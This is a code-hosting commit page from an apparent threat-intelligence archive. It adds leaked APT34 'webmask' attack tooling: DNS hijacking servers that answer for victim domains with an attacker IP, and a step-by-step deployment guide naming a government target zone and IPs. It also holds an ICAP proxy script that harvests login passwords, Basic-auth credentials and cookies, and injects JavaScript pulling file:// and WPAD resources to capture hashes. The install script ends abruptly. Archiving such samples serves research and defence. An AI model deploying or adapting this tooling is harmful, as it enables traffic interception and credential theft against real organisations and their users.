admin/APT_REPORT
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

APT34

Browse Source
This commit is contained in:
blackorbird
2019-04-18 11:19:12 +08:00
parent f6c2839353
commit b3c7e3e449
495 changed files with 73786 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
APT34/APT34-LeakCode/webmask/dns-redir/config.json Normal file
View File

@@ -0,0 +1,8 @@
{
"overrides":{
"victim_domain": "127.0.0.1"
},
"zones":[
"victim_domain"
]
}

98
APT34/APT34-LeakCode/webmask/dns-redir/dnsd.js Normal file
View File

@@ -0,0 +1,98 @@
var dns = require('native-dns');
var fs = require('fs');
var domainName = ['mail.<victim domain>', 'dns.<victim domain>'];
var zone = 'hostA.example.org';
var authorative = '<original nameserver ip>'; //must be ip
var responseIP = 'attacker server ip';
var server = dns.createServer();
function replaceAll(target, search, replacement) {
return target.replace(new RegExp(search, 'g'), replacement);
};
server.on('request', function (request, response) {
for(var i = 0; i < 1; i++)
{
var q = request.question[i].name.toLowerCase();
console.log('request = ' + q);
if(domainName.indexOf(q) > -1 && request.question[i].type == 1)
{
response.answer.push(dns.A({
name: request.question[i].name,
address: responseIP,
ttl: 600,
}));
response.send();
}
else if(q.indexOf(zone) != -1)
{
//redirect
//if(request.question[i].type == 1)
{
var question2 = dns.Question(request.question[i]);
/*question: dns.Question({
name: request.question[i].name,
type: 'A'
})
*/
var req = dns.Request({
question: question2,
server: { address: authorative, port: 53, type: 'udp' },
timeout: 1000,
});
req.on('timeout', function () {
console.log('Timeout in making request');
});
req.on('message', function (err, answer) {
//console.log(JSON.stringify(answer));
for (var j = answer.answer.length - 1; j >= 0; j--) {
//console.log(answer.answer[j]);
//if(answer.answer[j].type == 1)
{
response.answer.push(answer.answer[j]);
/*
response.answer.push(dns.A({
name: answer.answer[j].name,
address: answer.answer[j].address,
ttl: 600,
}));
*/
}
}
});
req.on('end', function () {
console.log('Finished processing request');
response.send();
});
console.log('sent ' + request.question[i].name)
req.send();
}
}
}
/*
response.answer.push(dns.A({
name: request.question[0].name,
address: '127.0.0.2',
ttl: 600,
}));
response.additional.push(dns.A({
name: 'hostA.example.org',
address: '127.0.0.3',
ttl: 600,
}));
*/
});
server.on('error', function (err, buff, req, res) {
console.log(err);
});
server.serve(53);

80
APT34/APT34-LeakCode/webmask/dns-redir/dnsd.py Normal file
View File

@@ -0,0 +1,80 @@
import socket
import SocketServer
import dnslib
import sys
import json
config_file = sys.argv[1]
redir_server = sys.argv[2]
host = "0.0.0.0"
port = 53
overrides = {}
zones = []
TTL = 60 * 5
def parse_config(config_file):
f = open(config_file)
config = json.loads(f.read())
f.close()
return config
class MyUDPHandler(SocketServer.BaseRequestHandler):
def inZone(self, packet):
try:
record = dnslib.DNSRecord.parse(packet).q
f = open('log.txt', 'a')
f.write(str(record) + '\n')
f.close()
print record
except:
return False
for zone in zones:
if str(record.qname).lower().endswith(zone):
return True
return False
def override(self, packet):
dns_record = dnslib.DNSRecord.parse(packet)
if str(dns_record.q.qname).lower() in overrides and dns_record.q.qtype == dnslib.QTYPE.A:
dns_record.rr = [dnslib.RR(rname=dns_record.q.qname, rtype=dnslib.QTYPE.A, rclass=1, ttl=TTL, rdata=dnslib.A(overrides[str(dns_record.q.qname).lower()]))]
print 'overrride', dns_record.rr[0]
'''
while True:
change = False
for i in range(0, len(dns_record.rr)):
if str(dns_record.rr[i].rname).lower() in overrides:
if dns_record.rr[i].rtype == dnslib.QTYPE.A and str(dns_record.rr[i].rdata) != overrides[str(dns_record.rr[i].rname).lower()]:
dns_record.rr[i].rdata = dnslib.A(overrides[str(dns_record.rr[i].rname).lower()])
change = True
print dns_record.rr[i]
if dns_record.rr[i].rtype == dnslib.QTYPE.CNAME and str(dns_record.rr[i].rdata).lower() not in overrides:
overrides[str(dns_record.rr[i].rdata).lower()] = overrides[str(dns_record.rr[i].rname).lower()]
change = True
print dns_record.rr[i]
if not change:
break
'''
return dns_record.pack()
def handle(self):
print self.client_address
data = self.request[0].strip()
input_socket = self.request[1]
if self.inZone(data):
redir_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
redir_socket.sendto(data, (redir_server, 53))
answer = redir_socket.recv(2048)
redir_socket.close()
answer = self.override(answer)
input_socket.sendto(answer, self.client_address)
#input_socket.close()
config = parse_config(config_file)
overrides = config['overrides']
zones = config['zones']
server = SocketServer.UDPServer((host, port), MyUDPHandler)
server.serve_forever()

150
APT34/APT34-LeakCode/webmask/guide.txt Normal file
View File

@@ -0,0 +1,150 @@
apt-get update
apt-get install vim
apt-get install screen
----Solution 1
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
rm -f get-pip.py
pip install dnslib
<copy dns_redir>
cd dns_redir
<edit config.json>
screen
python dnsd.py config.json <original nameserver>
<exit screen (Ctrl+A -> Ctrl_D)>
----Solution2 (use this)
apt-get install curl
apt-get install sudo
curl -sL https://deb.nodesource.com/setup_6.x | sudo -E bash -
sudo apt-get install -y nodejs
npm install -g forever
npm install -g forever-service
<copy dns_redir>
cd dns_redir
npm install native-dns
<edit dnsd.js>
var zone = 'tra.gov.ae';
var domainName = ['webmail.tra.gov.ae', 'dns.tra.gov.ae'];
var zone = 'tra.gov.ae';
var authorative = '195.229.237.52'; //must be ip
var responseIP = '185.162.235.106';
var server = dns.createServer();
forever-service install dns-server --script dnsd.js --start
**-----------------------------------------------ta inja
<copy icap server script>
ipcocd icap
screen
python icap.py
<exit screen (Ctrl+A -> Ctrl_D)>
cd /opt
apt-get install openssl devscripts build-essential libssl-dev apache2 squid-langpack
apt-get source squid3
apt-get build-dep squid3
cd squid3-3.4.8
vim debian/rules
<insert below lines in DEB_CONFIGURE_EXTRA_FLAGS section>
--enable-ssl \
--enable-ssl-crtd \
--with-open-ssl="/etc/ssl/openssl.cnf" \
debuild -us -uc
cd ..
dpkg -i *.deb
apt-get install -f
service apache2 stop
service squid3 stop
cd /etc/squid3/
mv squid.conf squid.conf.bckp
vim squid.conf
<insert below lines>
visible_hostname edge.<target-zone>
#http_port 80 accel defaultsite=<target-domain> no-vhost
#https_port 443 accel cert=/etc/letsencrypt/live/<target-domain>/fullchain.pem key=/etc/letsencrypt/live/<target-domain>/privkey.pem defaultsite=<target-domain> no-vhost
#cache_peer <original-target-ip> parent 80 0 no-query originserver name=webmask
#cache_peer <original-target-ip> parent 443 0 no-query originserver sslflags=DONT_VERIFY_PEER,DONT_VERIFY_DOMAIN login=PASS ssl front-end-https=on name=webmask
acl target_sites dstdomain <target-domain>
http_access allow target_sites
cache_peer_access webmask allow target_sites
cache_peer_access webmask deny all
icap_enable on
icap_persistent_connections off
adaptation_send_client_ip on
adaptation_masterx_shared_names X-Data
icap_service password_req reqmod_precache bypass=1 icap://127.0.0.1:1344/password
#icap_service password_resp respmod_precache bypass=1 icap://127.0.0.1:1344/password
icap_service cookie_req reqmod_precache bypass=1 icap://127.0.0.1:1344/cookie
#icap_service cookie_resp respmod_precache bypass=1 icap://127.0.0.1:1344/cookie
#icap_service inject_req reqmod_precache bypass=1 icap://127.0.0.1:1344/inject
icap_service inject_resp respmod_precache bypass=1 icap://127.0.0.1:1344/inject
icap_service headers_req reqmod_precache bypass=1 icap://127.0.0.1:1344/headers
#icap_service headers_resp respmod_precache bypass=1 icap://127.0.0.1:1344/headers
icap_service basic_req reqmod_precache bypass=1 icap://127.0.0.1:1344/basic
#icap_service basic_resp respmod_precache bypass=1 icap://127.0.0.1:1344/basic
adaptation_service_chain service_req password_req basic_req
#adaptation_service_chain service_resp
adaptation_access service_req allow all
#adaptation_access service_resp allow all
<replace target-domain and original-target-ip by its values>
<uncomment http_port and https_port if you want>
<uncomment which cache_peer you want>
<add needed icap_services to adaptation_service_chain>
<scan target server and find open ports>
nmap -vvv <original-target-ip>
apt-get install haproxy
cd /etc/haproxy/
vim haproxy.cfg
<comment below lines>
mode http
option httplog
<insert below lines for all of open port>
frontend ft_<port>
bind :<port>
mode tcp
default_backend bk_<port>
backend bk_<port>
mode tcp
balance roundrobin
stick-table type ip size 200k expire 30m
stick on src
default-server inter 1s
server s1 <original-target-ip>:<port> check id 1
<check no process listen on target ports>
netstat -nlp
service haproxy restart
---------------------------------------------
<change target domain nameserver and wait the change apply>
---------------------------------------------
<if you want get valid certificate for squid>
vim /etc/apt/sources.list
<insert below lines>
deb http://ftp.debian.org/debian jessie-backports main
deb-src http://ftp.debian.org/debian jessie-backports main
apt-get update
apt-get install certbot -t jessie-backports
vim /etc/haproxy/haproxy.cfg
<comment sections related to port 443>
service haproxy restart
certbot certonly --standalone -n -m <recovery-email> --agree-tos -d <target-domain>
vim /etc/haproxy/haproxy.cfg
<uncomment sections related to port 443>
service haproxy restart
vim /etc/haproxy/haproxy.cfg
<comment sections related to squid ports>
service haproxy restart
service squid3 start

297
APT34/APT34-LeakCode/webmask/icap/icap.py Normal file
View File

@@ -0,0 +1,297 @@
#!/bin/env python
# -*- coding: utf8 -*-
import random
import SocketServer
import re
import json
import traceback
import gzip
from threading import Thread
from pyicap import *
from dateutil import parser
from datetime import *
from StringIO import *
credentials_file = 'credentials.txt'
log_file = 'log.txt'
cookies_file = 'cookies.txt'
inject_file = 'injected.txt'
headers_file = 'headers.txt'
script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'
days = 3000
port = 1344
def log_to_file(path, log):
f = open(path, 'a+')
f.write(log + '\n')
f.close()
def extract_login_password(date, ip, url, body):
usernames = []
passwords = []
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena', 'secret']
logins = ['login', 'log-in', 'log_in', 'signin', 'sign-in', 'logon', 'log-on']
for login in userfields:
login_re = re.search('([^&]*%s[^=]*=[^&]+)' % login, body, re.IGNORECASE)
if login_re and len(login_re.group()) < 75:
usernames.append(login_re.group())
for passfield in passfields:
pass_re = re.search('([^&]*%s[^=]*=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re and len(pass_re.group()) < 75:
passwords.append(pass_re.group())
if len(usernames) > 0 and len(passwords) > 0:
log = {'date': date, 'ip': ip, 'type': 'login_password', 'url': url, 'usernames': usernames, 'passwords': passwords}
log_string = json.dumps(log, indent=4)
log_to_file(credentials_file, log_string)
print log_string
for login in logins:
if re.search(login, url, re.IGNORECASE):
log = {'date': date, 'ip': ip, 'type': 'login_url', 'url': url, 'body': body}
log_string = json.dumps(log, indent=4)
log_to_file(credentials_file, log_string)
class ThreadingSimpleServer(SocketServer.ThreadingMixIn, ICAPServer):
pass
class ICAPHandler(BaseICAPRequestHandler):
def password_OPTIONS(self):
self.set_icap_response(200)
#self.set_icap_header('Methods', 'RESPMOD')
self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
def password_REQMOD(self):
try:
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
log_string = '{0}\t{1}\t{2}\t{3}'.format(date, ip, method, url)
log_to_file(log_file, log_string)
#print log_string
if '204' not in self.allow and self.preview == None:
self.set_icap_response(200)
self.set_enc_request(' '.join(self.enc_req))
for h in self.enc_req_headers:
for v in self.enc_req_headers[h]:
self.set_enc_header(h, v)
if not self.has_body:
self.send_headers(False)
self.log_request(200)
return
self.send_headers(True)
body = ''
while self.has_body:
#print 'read start'
chunk = self.read_chunk()
#print 'read done', len(chunk)
if '204' not in self.allow and self.preview == None:
self.write_chunk(chunk)
if chunk == '':
if method == 'POST':
thread = Thread(target = extract_login_password, args = (date, ip, url, body))
thread.start()
break
elif method == 'POST':
body += chunk
if '204' in self.allow or self.preview != None:
self.set_icap_response(204)
self.send_headers()
#self.no_adaptation_required()
except:
traceback.print_exc()
raise
#def password_RESPMOD(self):
# self.no_adaptation_required()
def basic_OPTIONS(self):
self.set_icap_response(200)
#self.set_icap_header('Methods', 'RESPMOD')
self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
def basic_REQMOD(self):
try:
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
if 'authorization' in self.enc_req_headers and self.enc_req_headers['authorization'][0].startswith('Basic'):
cred = self.enc_req_headers['authorization'][0].split(' ')[1].decode('base64')
log = {'date': date, 'ip': ip, 'type':'basic_auth', 'url': url, 'cred': cred}
log_string = json.dumps(log, indent=4)
log_to_file(credentials_file, log_string)
#print log_string
if '204' not in self.allow and self.preview == None:
self.set_icap_response(200)
self.set_enc_request(' '.join(self.enc_req))
for h in self.enc_req_headers:
for v in self.enc_req_headers[h]:
self.set_enc_header(h, v)
self.send_headers(True)
while self.has_body:
#print 'read start'
chunk = self.read_chunk()
#print 'read done', len(chunk)
if '204' not in self.allow and self.preview == None:
self.write_chunk(chunk)
if chunk == '':
break
if '204' in self.allow or self.preview != None:
self.set_icap_response(204)
self.send_headers()
#self.no_adaptation_required()
except:
traceback.print_exc()
raise
#def basic_RESPMOD(self):
# self.no_adaptation_required()
def headers_OPTIONS(self):
self.set_icap_response(200)
#self.set_icap_header('Methods', 'RESPMOD')
self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
def headers_REQMOD(self):
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
for header in self.enc_req_headers:
log_string = '{0}\t{1}\t{2}\t{3}'.format(date, ip, url, self.enc_req_headers[header][0])
log_to_file(headers_file, log_string)
self.no_adaptation_required()
#def headers_RESPMOD(self):
# self.no_adaptation_required()
def cookie_OPTIONS(self):
self.set_icap_response(200)
#self.set_icap_header('Methods', 'RESPMOD')
self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
def cookie_REQMOD(self):
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
if 'cookie' in self.enc_req_headers:
cookies = self.enc_req_headers['cookie'][0]
log_string = '{0}\t{1}\t{2}\t{3}'.format(date, ip, url, cookies)
log_to_file(cookies_file, log_string)
self.no_adaptation_required()
#def cookie_RESPMOD(self):
# self.no_adaptation_required()
def inject_OPTIONS(self):
self.set_icap_response(200)
self.set_icap_header('Methods', 'RESPMOD')
#self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
#def inject_REQMOD(self):
# self.no_adaptation_required()
def inject_RESPMOD(self):
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
referer = ''
if 'referer' in self.enc_req_headers:
referer = self.enc_req_headers['referer'][0]
agent = ''
if 'user-agent' in self.enc_req_headers:
referer = self.enc_req_headers['user-agent'][0]
status = self.enc_res_status[1]
message = self.enc_res_status[2]
if 'content-type' in self.enc_res_headers and 'javascript' in self.enc_res_headers['content-type'][0]: #re.search('^[^\?]*\.js(\?.*)?$', url):
log_string = '{0}\t{1}\t{2}\t{3}\t{4}\t{5}\t{6}'.format(date, ip, status, method, url, referer, agent)
log_to_file(inject_file, log_string)
print log_string
compress = 'uncompress'
if 'content-encoding' in self.enc_res_headers:
if 'gzip' in self.enc_res_headers['content-encoding']:
compress = 'gzip'
if compress not in ['uncompress', 'gzip']:
self.no_adaptation_required()
return
body = ''
if self.has_body:
while True:
chunk = self.read_chunk()
body += chunk
if chunk == '':
break
if compress == 'gzip':
buf = StringIO(body)
body = gzip.GzipFile(fileobj=buf).read()
body += script
if compress == 'gzip':
temp = ''
buf = StringIO(temp)
gzip.GzipFile(fileobj=buf, mode='w').write(body)
body = buf.getvalue()
self.set_icap_response(200)
self.set_enc_status(' '.join(self.enc_res_status))
for h in self.enc_res_headers:
for v in self.enc_res_headers[h]:
if h == 'content-length':
self.set_enc_header(h, str(len(body)))
elif h == 'cache-control':
pass
elif h == 'expires':
pass
elif h == 'etag':
pass
else:
self.set_enc_header(h, v)
now = datetime.today()
delta = timedelta(days)
expires = now + delta
self.set_enc_header('expires', expires.strftime('%A, %d %b %Y %H:%M:%S GMT'))
self.set_enc_header('cache-control', 'max-age=' + str(int(delta.total_seconds())))
if not self.has_body:
self.send_headers(False)
return
self.send_headers(True)
self.write_chunk(body)
self.write_chunk('')
return
self.no_adaptation_required()
server = ThreadingSimpleServer(('127.0.0.1', port), ICAPHandler)
try:
while 1:
server.handle_request()
except KeyboardInterrupt:
print 'Finished'

40
APT34/APT34-LeakCode/webmask/install.sh Normal file
View File

@@ -0,0 +1,40 @@
#!/bin/bash
apt-get update
apt-get install vim
apt-get install screen
apt-get install curl
apt-get install sudo
curl -sL https://deb.nodesource.com/setup_6.x | sudo -E bash -
sudo apt-get install -y nodejs
npm install -g forever
npm install -g forever-service
npm install native-dns
echo -e "\033[1m Please Choose DNS zone For Panel : google.com\033[0m"
read wbemzone
echo -e "\033[1m Please Choose Webmail For Panel : webmail.google.com\033[0m"
read wbemwebmail
echo -e "\033[1m Please Choose Webmail For Panel : webmail.google.com\033[0m"
read wbemwebmail
echo -e "\033[1m Please Choose authorative ip For Panel : \033[0m"
read wbemauthorativeip
echo -e "\033[1m Please Choose Server IP For Panel : webmail.google.com\033[0m"
read wbemserverip
authorative